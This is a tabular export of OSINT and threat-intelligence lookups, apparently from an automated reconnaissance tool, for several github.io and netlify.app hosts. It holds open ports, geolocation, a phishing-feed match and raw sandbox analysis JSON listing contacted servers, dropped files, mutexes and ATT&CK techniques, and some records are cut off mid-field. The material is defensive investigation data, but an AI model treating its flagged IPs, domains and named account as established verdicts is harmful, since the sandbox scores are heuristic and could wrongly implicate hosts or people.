| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-ye.github.io | 185.199.111.153 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007hyno.github.io]
https://www.openphish.com/feed.txt | 007hyno.github.io |
| 2023-05-12 02:45:26 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | Toronto, Ontario, ON, Canada, CA | 104.21.71.14 |
| 2023-05-12 03:32:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.6:8080 | 188.114.97.0/24 |
| 2023-05-12 03:19:22 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.109.153:80 | 185.199.109.0/24 |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2053 | 188.114.97.1 |
| 2023-05-12 02:58:11 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [u'34.148.97.127', u'172.67.191.224'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://earnest-meringue-443870.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarDD5A.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"\n "172.67.191.224:80"\n "34.236.97.106:443"\n "142.250.72.168:443"\n "35.190.72.161:443"\n "142.250.217.131:80"\n "104.18.156.225:443"\n "35.190.36.172:443"\n "142.250.189.14:80"\n "192.124.249.24:80"\n "35.190.13.203:443"\n "192.124.249.41:80"\n "142.250.188.238:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_bb4_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_bb4_IESQMMUTEX_0_303"\n "IsoScope_bb4_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_bb4_ConnHashTable<2996>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_bb4_IE_EarlyTabStart_0xd98_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2996"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2996"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ml-trk.com"\n "ocsp.pki.goog"\n "crls.pki.goog"\n "crl.pki.goog"\n "ocsp.godaddy.com"\n "crl.godaddy.com"\n "aux.fqtag.com"\n "cdn.fqtag.com"\n "flx808.lporirxe.com"\n "fqtag.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabDD18.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "CabDD59.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "5GYBJR85.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5GYBJR85.txt]- [targetUID: 00000000-00003196]\n "ncvp_1_.js" has type "data"- [targetUID: N/A]\n "regular_1_.png" has type "PNG image data 70 x 70 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "3538626A1FCCCA43C7E18F220BDD9B02" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\3538626A1FCCCA43C7E18F220BDD9B02]- [targetUID: 00000000-00003196]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003196]\n "jquery.autoComplete_1_.js" has type "UTF-8 Unicode text with CRLF line terminators"- [targetUID: N/A]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00003196]\n "B46PLW8Z.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\B46PLW8Z.txt]- [targetUID: 00000000-00003196]\n "70DAE932E3BCB3C00656A27B544BA9CA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\70DAE932E3BCB3C00656A27B544BA9CA]- [targetUID: 00000000-00003196]\n "07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D]- [targetUID: 00000000-00003196]\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6DB145CFEEC544B1582FED1ADA3370DD]- [targetUID: 00000000-00002996]\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C6F6EC64E114822DF688DC12CDD86C]- [targetUID: 00000000-00002996]\n "logo_3_.png" has type "PNG image data 647 x 80 8-bit/color RGBA interlaced"- [targetUID: N/A]\n "CabDD18.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\CabDD18.tmp]- [targetUID: 00000000-00003196]\n "CabDD59.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\CabDD59.tmp]- [targetUID: 00000000-00003196]\n "EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D]- [targetUID: 00000000-00003196]\n "67F6625BC22310D5C99DDE12020DBD90" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\67F6625BC22310D5C99DDE12020DBD90]- [targetUID: 00000000-00003196]\n "TarDD5A.tmp" has type "data"- Location: [%TEMP%\\TarDD5A.tmp]- [targetUID: 00000000-00003196]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"crl.godaddy.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-20', u'name': u'HTTP request contains Base64 encoded artifacts', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1132/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1132.001', u'relevance': 7, u'threat_level': 0, u'type': 7, u'description': u'"i$Cj&){akj-{%"\n "P`<1"\n "_|~wmmm|w;"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://earnest-meringue-443870.netlify.app/"- [Source: Input]\n Pattern match: "https://earnest-meringue-443870.netlify.app"- [Source: Input]\n Heuristic match: "ml-trk.com"- [Source: PCAP]\n Heuristic match: "ocsp.godaddy.com"- [Source: PCAP]\n Heuristic match: "GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.godaddy.com"- [Source: PCAP]\n Heuristic match: "crl.godaddy.com"- [Source: PCAP]\n Heuristic match: "GET /gdroot-g2.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.godaddy.com"- [Source: PCAP]\n Heuristic match: "GET //MEIwQDA%2BMDwwOjAJBgUrDgMCGgUABBQdI2%2BOBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.godaddy.com"- [Source: PCAP]\n Heuristic match: "aux.fqtag.com"- [Source: PCAP]\n Heuristic match: "cdn.fqtag.com"- [Source: PCAP]\n Heuristic match: "flx808.lporirxe.com"- [Source: PCAP]\n Heuristic match: "fqtag.com"- [Source: PCAP]\n Pattern match: "www.ukrainiangirldating.com"- [Source: PCAP]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.148.97.127": ...\n\n URL: http://junglefreaks.store/ (AV positives: 1/88 scanned on 08/23/2022 08:36:00)\n URL: http://imrn.dev/ (AV positives: 1/88 scanned on 08/23/2022 08:2 | 34.148.97.127 |
| 2023-05-12 02:44:48 | Raw Data from RIRs | No | CRXcavator | 0 | 0 | 1 | 0 | None | [{"platform": "Chrome", "extension_id": "mdcffelghikdiafnfodjlgllenhlnejl", "name": "GayHub", "icon": "https://lh3.googleusercontent.com/rZ8V_inU3Be2PxnPEyV9srR3G_5mJ_618v81YKqluedhhRG1boWeD5rZHFFN4VI0_7dmWXBueXjQBFnTN4kAfCmNbQ=w128-h128-e365-rj-sc0x00ffffff"}, {"platform": "Chrome", "extension_id": "ppaeilehlbalfblndppebfpgikeodlaj", "name": "Aliexpress Ebay DropShipping - Ebayhunt", "icon": "https://lh3.googleusercontent.com/NzJqQYrT2UL825AQ1yg79_gtXND1L0CSo0J9AZpMiqonPLiAlckkEKy_UTvkE8T_pr0zXKykXV--eedN26HQTPNl8g=w128-h128-e365-rj-sc0x00ffffff"}, {"platform": "Chrome", "extension_id": "agjliddikiapkkpacaacecphgdoplfop", "name": "ReplayHub YouTube Looper", "icon": "https://lh3.googleusercontent.com/8hLe0teq-FvENQnMGTH5hbKoAgfgd5YttifZdgjiDupvDj0k9qP7enO7qNry3CWBXmZtrms-qMTbQk7rL--uibGNuA=w128-h128-e365-rj-sc0x00ffffff"}, {"platform": "Chrome", "extension_id": "fcnbnbmppjiehikhcaalfjmopkpfaeji", "name": "DayHub", "icon": "https://lh3.googleusercontent.com/v78saLETMsfToP0i6U9zZo4gg6OjGyRw-VmkftOIrIhRyAsqH79lO7JoC5e6S5lrwbbqFRZxCrnAAZagk0kSEqfnJA=w128-h128-e365-rj-sc0x00ffffff"}] | ayhu.xyz |
| 2023-05-12 02:58:44 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://mweb0-80901e.netlify.app/', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://mweb0-80901e.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2072"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_818_IE_EarlyTabStart_0xca0_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_818_ConnHashTable<2072>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_818_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_818_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_818_IESQMMUTEX_0_519"\n "IsoScope_818_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"mweb0-80901e.netlify.app"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"mweb0-80901e.netlify.app"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "YQ5SEDTB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YQ5SEDTB.txt]- [targetUID: 00000000-00001620]\n Dropped file: "AROYBRGH.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AROYBRGH.txt]- [targetUID: 00000000-00002072]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_7B887D42-4986-11ED-AB02-0800276C7FB6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002072]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "down_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002072]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "YQ5SEDTB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YQ5SEDTB.txt]- [targetUID: 00000000-00001620]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00001620]\n "~DF86DCA3C105E64A15.TMP" has type "data"- Location: [%TEMP%\\~DF86DCA3C105E64A15.TMP]- [targetUID: 00000000-00002072]\n "bullet_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "~DFFC6806C45B651F0F.TMP" has type "data"- Location: [%TEMP%\\~DFFC6806C45B651F0F.TMP]- [targetUID: 00000000-00002072]\n "~DF7E185BA9CDCD7E04.TMP" has type "data"- Location: [%TEMP%\\~DF7E185BA9CDCD7E04.TMP]- [targetUID: 00000000-00002072]\n "RecoveryStore._72EB1E11-4986-11ED-AB02-0800276C7FB6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search_1_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "~DF138D1E12921648C6.TMP" has type "data"- Location: [%TEMP%\\~DF138D1E12921648C6.TMP]- [targetUID: 00000000-00002072]\n "AROYBRGH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AROYBRGH.txt]- [targetUID: 00000000-00002072]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://mweb0-80901e.netlify.app/"\n Pattern match: "http://mweb0-80901e.netlify.app"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'}], u'threat_level': 0, u'size': None, u'job_id': u'6345bb9d4e344208ff5110da', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'34.74.170.74'], u'sha256': u'fb77b9fcfedf278c3a95dd022207815d527f6c39672b7d4bb735ccbd564c337b', u'sha512': u'4f7bd48309dcc7b5917de449f1e56343cb22f52f61225dbede044a11aadf97d927952fb16869bc2fd5018d15bfef91c65cfe530a71e476536d6495bd366a6c20', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://mweb0-80901e.netlify.app/', u'submission_id': u'6345bb9d4e344208ff5110db', u'created_at': u'2022-10-11T18:53:17+00:00', u'filename': None}], u'analysis_start_time': u'2022-10-11T19:00:12+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 9, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'37c65a44456d2f754ced9db60a31d03d', u'network_mode': u'default', u'processes': [], u'sha1': u'f379a65fd9d21e0d17f0afce1b5ba3000bda7c23', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'mweb0-80901e.netlify.app'], u'extracted_files': [], u'type_short': []}] | 34.74.170.74 |
| 2023-05-12 02:45:38 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | San Francisco, United States | 185.199.108.153 |
| 2023-05-12 02:46:49 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 35.229.48.116 |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | GitHub (Category: coding)
https://github.com/patrickpogoda | patrickpogoda |
| 2023-05-12 02:50:03 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 9, u'threat_score': 80, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.pgupta.info/favicon/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d40_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d40_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_d40_IESQMMUTEX_0_519"\n "SmartScreen_ClientId_Mutex"\n "IsoScope_d40_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_d40_ConnHashTable<3392>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "_SHuassist.mtx"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3392"\n "IsoScope_d40_IE_EarlyTabStart_0xd6c_Mutex"\n "CommunicationManager_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "SmartScreen_AppRepSettings_Mutex"\n "Local\\LRIEElevationPolicyMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "rundll32.exe" with commandline "%WINDIR%\\system32\\shell32.dll,OpenAs_RunDLL %USERPROFILE%\\Downlo ..." (UID: 00000000-00002788)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00003052)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00002568)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00002672)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "AcroRd32.exe" (UID: 00000000-00002568) was launched with modified environment variables: "PATH"\n Process "RdrCEF.exe" (UID: 00000000-00000132) was launched with modified environment variables: "PATH"\n Process "AcroRd32.exe" (UID: 00000000-00002672) was launched with modified environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "rundll32.exe" with commandline "%WINDIR%\\system32\\shell32.dll,OpenAs_RunDLL %USERPROFILE%\\Downlo ..." (UID: 00000000-00002788)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00003052)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00002568)\n Spawned process "RdrCEF.exe" with commandline "--backgroundcolor=16448250" (UID: 00000000-00000132)\n Spawned process "RdrCEF.exe" with commandline "--type=renderer --primordial-pipe-token=B4A00A12D81E18D5F5C2C768 ..." (UID: 00000000-00002736)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00002672)'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1546/015', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1546.015', u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"rundll32.exe" touched "UsersFiles" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER")\n "rundll32.exe" touched "Adobe Acrobat Document" (Path: 